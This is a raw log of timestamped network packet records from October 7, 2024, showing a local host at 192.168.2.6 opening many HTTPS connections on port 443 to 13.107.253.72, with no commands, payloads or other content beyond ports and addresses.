Oct 7, 2024 18:47:44.334918022 CEST	49792	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.334937096 CEST	443	49792	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.334969044 CEST	49786	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.334969044 CEST	49786	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.334995985 CEST	443	49786	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.335009098 CEST	443	49786	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.335391998 CEST	49793	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.335449934 CEST	443	49793	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.335623026 CEST	49793	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.335623026 CEST	49793	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.335661888 CEST	443	49793	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.340388060 CEST	49794	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.340400934 CEST	443	49794	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.344819069 CEST	49794	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.344954967 CEST	49794	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.344985008 CEST	443	49794	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.391494989 CEST	443	49790	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.391556025 CEST	443	49790	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.391647100 CEST	49790	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.391833067 CEST	49790	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.391863108 CEST	443	49790	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.391897917 CEST	49790	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.391906023 CEST	443	49790	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.395750046 CEST	49795	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.395776033 CEST	443	49795	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.395880938 CEST	49795	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.401700020 CEST	49795	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.401715994 CEST	443	49795	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.042586088 CEST	443	49791	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.043870926 CEST	49791	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.043870926 CEST	49791	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.043889999 CEST	443	49791	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.043904066 CEST	443	49791	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.153903008 CEST	443	49791	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.154068947 CEST	443	49791	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.154215097 CEST	49791	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.154215097 CEST	49791	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.154282093 CEST	49791	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.154297113 CEST	443	49791	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.156589985 CEST	49796	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.156630993 CEST	443	49796	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.156708956 CEST	49796	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.156835079 CEST	49796	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.156845093 CEST	443	49796	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.220982075 CEST	443	49792	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.221405983 CEST	49792	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.221424103 CEST	443	49792	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.223712921 CEST	49792	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.223716974 CEST	443	49792	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.228571892 CEST	443	49793	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.228961945 CEST	49793	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.229028940 CEST	443	49793	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.229331970 CEST	49793	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.229346037 CEST	443	49793	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.233170986 CEST	443	49795	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.233325005 CEST	443	49794	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.233495951 CEST	49795	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.233500957 CEST	443	49795	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.233648062 CEST	49794	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.233665943 CEST	443	49794	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.233987093 CEST	49794	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.233999968 CEST	443	49794	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.234134912 CEST	49795	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.234138966 CEST	443	49795	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.326951027 CEST	443	49792	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.327018976 CEST	443	49792	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.327070951 CEST	49792	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.327223063 CEST	49792	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.327235937 CEST	443	49792	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.329813004 CEST	49797	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.329914093 CEST	443	49797	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.330148935 CEST	49797	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.330307961 CEST	49797	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.330343008 CEST	443	49797	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.335823059 CEST	443	49793	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.335985899 CEST	443	49793	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.336071014 CEST	49793	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.336071014 CEST	49793	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.336158991 CEST	49793	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.336200953 CEST	443	49793	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.337907076 CEST	49798	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.337938070 CEST	443	49798	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.338090897 CEST	49798	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.338221073 CEST	49798	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.338247061 CEST	443	49798	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.338541985 CEST	443	49795	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.338696003 CEST	443	49795	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.338759899 CEST	49795	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.338779926 CEST	49795	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.338793039 CEST	443	49795	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.338800907 CEST	49795	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.338805914 CEST	443	49795	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.340480089 CEST	49799	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.340519905 CEST	443	49799	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.340606928 CEST	49799	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.340733051 CEST	49799	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.340745926 CEST	443	49799	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.345871925 CEST	443	49794	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.345944881 CEST	443	49794	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.345992088 CEST	49794	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.346087933 CEST	49794	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.346087933 CEST	49794	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.346110106 CEST	443	49794	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.346134901 CEST	443	49794	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.347733021 CEST	49800	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.347778082 CEST	443	49800	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.347913027 CEST	49800	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.348042965 CEST	49800	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.348082066 CEST	443	49800	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.973002911 CEST	443	49796	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.983495951 CEST	49796	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.983534098 CEST	443	49796	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:45.988773108 CEST	49796	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:45.988791943 CEST	443	49796	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.097006083 CEST	443	49796	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.097071886 CEST	443	49796	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.097275972 CEST	49796	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.101823092 CEST	443	49798	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.102113962 CEST	49796	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.102147102 CEST	443	49796	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.102164984 CEST	49796	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.102171898 CEST	443	49796	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.103796959 CEST	49798	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.103864908 CEST	443	49798	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.104305029 CEST	49798	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.104321003 CEST	443	49798	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.107120991 CEST	49801	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.107163906 CEST	443	49801	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.107235909 CEST	49801	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.107450962 CEST	49801	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.107467890 CEST	443	49801	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.142611980 CEST	443	49797	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.143286943 CEST	49797	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.143377066 CEST	443	49797	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.143954992 CEST	49797	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.143973112 CEST	443	49797	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.191129923 CEST	443	49799	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.191554070 CEST	49799	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.191566944 CEST	443	49799	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.191961050 CEST	49799	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.191972971 CEST	443	49799	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.199589968 CEST	443	49800	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.199953079 CEST	49800	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.199968100 CEST	443	49800	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.200359106 CEST	49800	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.200366020 CEST	443	49800	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.212032080 CEST	443	49798	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.212085962 CEST	443	49798	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.212167978 CEST	49798	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.212208986 CEST	443	49798	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.212253094 CEST	443	49798	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.212322950 CEST	49798	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.212372065 CEST	49798	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.212372065 CEST	49798	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.212409973 CEST	443	49798	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.212424994 CEST	443	49798	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.214854002 CEST	49802	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.214875937 CEST	443	49802	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.214937925 CEST	49802	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.215094090 CEST	49802	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.215104103 CEST	443	49802	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.230369091 CEST	443	49802	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.230613947 CEST	49803	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.230637074 CEST	443	49803	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.230698109 CEST	49803	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.230916023 CEST	49803	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.230930090 CEST	443	49803	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.254996061 CEST	443	49803	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.257839918 CEST	49803	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.259124994 CEST	49803	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.259136915 CEST	443	49803	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.261147976 CEST	49804	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.261240959 CEST	443	49804	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.261322975 CEST	49804	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.261473894 CEST	49804	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.261508942 CEST	443	49804	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.310290098 CEST	443	49797	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.310446978 CEST	443	49797	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.310570955 CEST	49797	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.310689926 CEST	49797	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.310689926 CEST	49797	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.310735941 CEST	443	49797	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.310775042 CEST	443	49797	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.313080072 CEST	49805	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.313129902 CEST	443	49805	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.313208103 CEST	49805	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.313383102 CEST	49805	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.313400984 CEST	443	49805	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.325737000 CEST	443	49799	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.325808048 CEST	443	49799	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.325845957 CEST	49799	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.326029062 CEST	49799	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.326029062 CEST	49799	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.326046944 CEST	443	49799	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.326056957 CEST	443	49799	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.328186989 CEST	49806	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.328217030 CEST	443	49806	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.328285933 CEST	49806	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.328449965 CEST	49806	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.328465939 CEST	443	49806	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.351300955 CEST	443	49806	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.351371050 CEST	49806	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.351416111 CEST	49806	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.351432085 CEST	443	49806	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.351602077 CEST	49807	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.351659060 CEST	443	49807	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.351777077 CEST	49807	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.352063894 CEST	49807	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.352094889 CEST	443	49807	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.368268967 CEST	443	49800	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.368350983 CEST	443	49800	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.368408918 CEST	49800	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.368561029 CEST	49800	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.368581057 CEST	443	49800	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.368596077 CEST	49800	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.368602991 CEST	443	49800	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.371227980 CEST	49808	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.371299028 CEST	443	49808	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.371444941 CEST	49808	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.371623039 CEST	49808	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.371659040 CEST	443	49808	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.770708084 CEST	443	49801	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.770965099 CEST	443	49804	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.771044016 CEST	443	49804	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.771177053 CEST	49801	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.771194935 CEST	49804	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.771222115 CEST	443	49801	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.771291018 CEST	49804	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.771336079 CEST	443	49804	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.771457911 CEST	49809	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.771503925 CEST	443	49809	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.771624088 CEST	49809	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.771651030 CEST	49801	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.771657944 CEST	443	49801	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.771759987 CEST	49809	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.771775007 CEST	443	49809	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.876075983 CEST	443	49801	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.876121044 CEST	443	49801	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.876203060 CEST	443	49801	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.876276016 CEST	49801	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.876441002 CEST	49801	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.876462936 CEST	443	49801	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.876487970 CEST	49801	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.876496077 CEST	443	49801	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.879486084 CEST	49810	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.879518986 CEST	443	49810	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.879587889 CEST	49810	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.879769087 CEST	49810	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.879785061 CEST	443	49810	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.961549997 CEST	443	49805	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.961636066 CEST	49805	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.962692022 CEST	49805	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.962702036 CEST	443	49805	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.963680029 CEST	443	49805	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.964392900 CEST	49805	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.994853020 CEST	443	49807	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.994942904 CEST	49807	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.996361017 CEST	49807	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:46.996391058 CEST	443	49807	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.996614933 CEST	443	49807	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:46.997293949 CEST	49807	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.011399984 CEST	443	49805	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.043404102 CEST	443	49807	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.066791058 CEST	443	49808	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.066883087 CEST	49808	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.067907095 CEST	49808	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.067936897 CEST	443	49808	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.068281889 CEST	443	49808	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.069014072 CEST	49808	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.072422981 CEST	443	49805	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.072807074 CEST	443	49805	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.072861910 CEST	49805	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.072881937 CEST	443	49805	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.072920084 CEST	443	49805	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.072961092 CEST	49805	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.072988033 CEST	443	49805	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.073002100 CEST	49805	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.073002100 CEST	49805	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.073012114 CEST	443	49805	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.073019981 CEST	443	49805	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.075525045 CEST	49811	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.075586081 CEST	443	49811	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.075666904 CEST	49811	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.075822115 CEST	49811	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.075838089 CEST	443	49811	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.099251986 CEST	443	49807	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.099627018 CEST	443	49807	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.099723101 CEST	49807	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.099781036 CEST	49807	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.099781036 CEST	49807	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.099817038 CEST	443	49807	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.099839926 CEST	443	49807	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.102287054 CEST	49812	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.102385998 CEST	443	49812	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.102468014 CEST	49812	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.102602005 CEST	49812	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.102624893 CEST	443	49812	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.115402937 CEST	443	49808	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.179696083 CEST	443	49808	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.179872990 CEST	443	49808	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.179945946 CEST	49808	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.180035114 CEST	49808	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.180073977 CEST	443	49808	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.180104017 CEST	49808	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.180120945 CEST	443	49808	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.182391882 CEST	49813	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.182416916 CEST	443	49813	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.182487011 CEST	49813	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.182646990 CEST	49813	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.182651997 CEST	443	49813	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.433068037 CEST	443	49809	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.433141947 CEST	49809	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.434345007 CEST	49809	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.434360027 CEST	443	49809	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.434571028 CEST	443	49809	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.435409069 CEST	49809	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.483397961 CEST	443	49809	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.529356003 CEST	443	49810	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.529429913 CEST	49810	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.530658960 CEST	49810	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.530667067 CEST	443	49810	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.531100035 CEST	443	49810	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.531722069 CEST	49810	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.543612003 CEST	443	49809	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.543637037 CEST	443	49809	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.543685913 CEST	443	49809	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.543692112 CEST	49809	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.543725014 CEST	49809	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.543900967 CEST	49809	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.543916941 CEST	443	49809	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.543927908 CEST	49809	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:47.543931961 CEST	443	49809	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:47.546956062 CEST	49814	443	192.168.2.6	13.107.253.72
